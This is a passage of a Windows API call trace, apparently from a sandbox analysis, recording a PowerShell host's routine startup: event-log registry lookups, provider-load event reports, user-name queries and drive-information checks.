	[0290.178] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x388) returned 0x0
	[0290.178] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.179] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x38c) returned 0x0
	[0290.179] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.179] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x390) returned 0x0
	[0290.179] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.179] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x394) returned 0x0
	[0290.179] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x398) returned 0x0
	[0290.179] RegCloseKey (hKey=0x398) returned 0x0
	[0290.180] RegCloseKey (hKey=0x374) returned 0x0
	[0290.180] RegCloseKey (hKey=0x394) returned 0x0
	[0290.181] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d398 | out: phkResult=0x16d398*=0x394) returned 0x0
	[0290.181] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d30c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d308, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d30c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d308*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.181] CoTaskMemFree (pv=0x0) 
	[0290.181] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.181] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x262650, lpcchName=0x16d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.181] CoTaskMemFree (pv=0x262650) 
	[0290.181] CoTaskMemFree (pv=0x0) 
	[0290.181] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.181] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x262650, lpcchName=0x16d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.182] CoTaskMemFree (pv=0x262650) 
	[0290.182] CoTaskMemFree (pv=0x0) 
	[0290.182] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.182] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x262650, lpcchName=0x16d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.182] CoTaskMemFree (pv=0x262650) 
	[0290.182] CoTaskMemFree (pv=0x0) 
	[0290.182] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.182] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x262650, lpcchName=0x16d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.182] CoTaskMemFree (pv=0x262650) 
	[0290.182] CoTaskMemFree (pv=0x0) 
	[0290.182] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.182] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x262650, lpcchName=0x16d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.182] CoTaskMemFree (pv=0x262650) 
	[0290.182] CoTaskMemFree (pv=0x0) 
	[0290.182] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.182] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x262650, lpcchName=0x16d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.182] CoTaskMemFree (pv=0x262650) 
	[0290.182] CoTaskMemFree (pv=0x0) 
	[0290.183] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.183] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x262650, lpcchName=0x16d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.183] CoTaskMemFree (pv=0x262650) 
	[0290.183] CoTaskMemFree (pv=0x0) 
	[0290.183] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.183] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x262650, lpcchName=0x16d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.183] CoTaskMemFree (pv=0x262650) 
	[0290.183] CoTaskMemFree (pv=0x0) 
	[0290.183] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.183] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x262650, lpcchName=0x16d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.183] CoTaskMemFree (pv=0x262650) 
	[0290.183] CoTaskMemFree (pv=0x0) 
	[0290.183] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x374) returned 0x0
	[0290.183] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x0) returned 0x2
	[0290.184] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x398) returned 0x0
	[0290.184] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x0) returned 0x2
	[0290.184] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x39c) returned 0x0
	[0290.184] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x0) returned 0x2
	[0290.184] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x3a0) returned 0x0
	[0290.184] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x0) returned 0x2
	[0290.185] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x3a4) returned 0x0
	[0290.185] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x0) returned 0x2
	[0290.185] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x3a8) returned 0x0
	[0290.185] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x0) returned 0x2
	[0290.185] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x3ac) returned 0x0
	[0290.185] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x0) returned 0x2
	[0290.185] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x3b0) returned 0x0
	[0290.185] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x0) returned 0x2
	[0290.186] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x3b4) returned 0x0
	[0290.186] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3f8 | out: phkResult=0x16d3f8*=0x3b8) returned 0x0
	[0290.186] RegCloseKey (hKey=0x3b8) returned 0x0
	[0290.186] RegCloseKey (hKey=0x394) returned 0x0
	[0290.186] RegCloseKey (hKey=0x3b4) returned 0x0
	[0290.190] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b810008
	[0291.018] ReportEventW (hEventLog=0x1b810008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32dcc28*="WSMan", lpRawData=0x32dc998) returned 1
	[0292.555] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0292.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.556] CoTaskMemFree (pv=0x2c9fb0) 
	[0292.582] CoTaskMemAlloc (cb=0x804) returned 0x1b6d6480
	[0292.582] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6d6480, nSize=0x16d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d688) returned 0x1
	[0292.600] CoTaskMemFree (pv=0x1b6d6480) 
	[0292.600] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0292.600] GetUserNameW (in: lpBuffer=0x262650, pcbBuffer=0x16d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d6c8) returned 1
	[0292.600] CoTaskMemFree (pv=0x262650) 
	[0292.601] ReportEventW (hEventLog=0x1b810008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dcc5a0*="Alias", lpRawData=0x2dcc330) returned 1
	[0292.649] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0292.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.649] CoTaskMemFree (pv=0x2c9fb0) 
	[0292.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.652] CoTaskMemAlloc (cb=0x804) returned 0x1b6d6480
	[0292.652] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6d6480, nSize=0x16d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d688) returned 0x1
	[0292.652] CoTaskMemFree (pv=0x1b6d6480) 
	[0292.652] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0292.652] GetUserNameW (in: lpBuffer=0x262650, pcbBuffer=0x16d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d6c8) returned 1
	[0292.652] CoTaskMemFree (pv=0x262650) 
	[0292.653] ReportEventW (hEventLog=0x1b810008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd1b98*="Environment", lpRawData=0x2dd1928) returned 1
	[0292.667] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0292.667] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.667] CoTaskMemFree (pv=0x2c9fb0) 
	[0292.668] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0292.668] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0292.668] CoTaskMemFree (pv=0x2c9fb0) 
	[0292.668] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0292.668] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0292.668] CoTaskMemFree (pv=0x2c9fb0) 
	[0292.669] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0292.669] SetErrorMode (uMode=0x1) returned 0x1
	[0292.669] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.669] SetErrorMode (uMode=0x1) returned 0x1
	[0292.670] GetLogicalDrives () returned 0x4
	[0292.671] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.672] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.672] SetErrorMode (uMode=0x1) returned 0x1
	[0292.673] CoTaskMemAlloc (cb=0x68) returned 0x2de0a0
	[0292.673] CoTaskMemAlloc (cb=0x68) returned 0x2de490
	[0292.673] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2de0a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d410, lpMaximumComponentLength=0x16d40c, lpFileSystemFlags=0x16d408, lpFileSystemNameBuffer=0x2de490, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d410*=0x9c354b42, lpMaximumComponentLength=0x16d40c*=0xff, lpFileSystemFlags=0x16d408*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0292.673] CoTaskMemFree (pv=0x2de0a0) 
	[0292.673] CoTaskMemFree (pv=0x2de490) 
	[0292.674] SetErrorMode (uMode=0x1) returned 0x1
	[0292.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.675] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.675] SetErrorMode (uMode=0x1) returned 0x1
	[0292.675] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d3b0 | out: lpFileInformation=0x16d3b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.675] SetErrorMode (uMode=0x1) returned 0x1
	[0292.675] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.675] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d000, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.676] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.676] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.676] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.677] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.677] SetErrorMode (uMode=0x1) returned 0x1
	[0292.677] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d1e0 | out: lpFileInformation=0x16d1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.677] SetErrorMode (uMode=0x1) returned 0x1
	[0292.677] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.677] SetErrorMode (uMode=0x1) returned 0x1
	[0292.678] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d1e0 | out: lpFileInformation=0x16d1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.678] SetErrorMode (uMode=0x1) returned 0x1
	[0292.678] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d020, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.678] SetErrorMode (uMode=0x1) returned 0x1
	[0292.678] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d280 | out: lpFileInformation=0x16d280*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.678] SetErrorMode (uMode=0x1) returned 0x1
	[0292.679] CoTaskMemAlloc (cb=0x804) returned 0x1b6d6480
	[0292.679] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6d6480, nSize=0x16d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d688) returned 0x1
	[0292.679] CoTaskMemFree (pv=0x1b6d6480) 
	[0292.679] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0292.679] GetUserNameW (in: lpBuffer=0x262650, pcbBuffer=0x16d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d6c8) returned 1
	[0292.679] CoTaskMemFree (pv=0x262650) 
	[0292.680] ReportEventW (hEventLog=0x1b810008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd8c88*="FileSystem", lpRawData=0x2dd8a18) returned 1
	[0292.734] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0292.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.735] CoTaskMemFree (pv=0x2c9fb0) 
	[0292.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.737] CoTaskMemAlloc (cb=0x804) returned 0x1b6d6480
	[0292.737] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6d6480, nSize=0x16d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d688) returned 0x1
	[0292.737] CoTaskMemFree (pv=0x1b6d6480) 
	[0292.737] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0292.737] GetUserNameW (in: lpBuffer=0x262650, pcbBuffer=0x16d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d6c8) returned 1
	[0292.737] CoTaskMemFree (pv=0x262650) 
	[0292.738] ReportEventW (hEventLog=0x1b810008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dde4c8*="Function", lpRawData=0x2dde258) returned 1
	[0292.780] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0292.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.780] CoTaskMemFree (pv=0x2c9fb0) 
	[0293.563] CoTaskMemAlloc (cb=0x804) returned 0x1b6d6480
	[0293.563] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6d6480, nSize=0x16d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d688) returned 0x1
	[0293.564] CoTaskMemFree (pv=0x1b6d6480) 
	[0293.564] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0293.564] GetUserNameW (in: lpBuffer=0x262650, pcbBuffer=0x16d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d6c8) returned 1
	[0293.564] CoTaskMemFree (pv=0x262650) 
	[0293.564] ReportEventW (hEventLog=0x1b810008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e108a0*="Registry", lpRawData=0x2e10630) returned 1
	[0293.754] CoTaskMemAlloc (cb=0x804) returned 0x1b6d6480
	[0293.754] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6d6480, nSize=0x16d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d688) returned 0x1
	[0293.755] CoTaskMemFree (pv=0x1b6d6480) 
	[0293.755] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0293.755] GetUserNameW (in: lpBuffer=0x262650, pcbBuffer=0x16d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d6c8) returned 1
	[0293.755] CoTaskMemFree (pv=0x262650) 
	[0293.755] ReportEventW (hEventLog=0x1b810008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e15cb8*="Variable", lpRawData=0x2e15a48) returned 1
	[0293.768] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0293.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.768] CoTaskMemFree (pv=0x2c9fb0) 
	[0293.769] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0293.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.769] CoTaskMemFree (pv=0x2c9fb0) 
	[0293.790] CoTaskMemAlloc (cb=0x804) returned 0x1b6d6480
	[0293.790] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6d6480, nSize=0x16d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d688) returned 0x1
	[0293.791] CoTaskMemFree (pv=0x1b6d6480) 
	[0293.791] CoTaskMemAlloc (cb=0x204) returned 0x262650
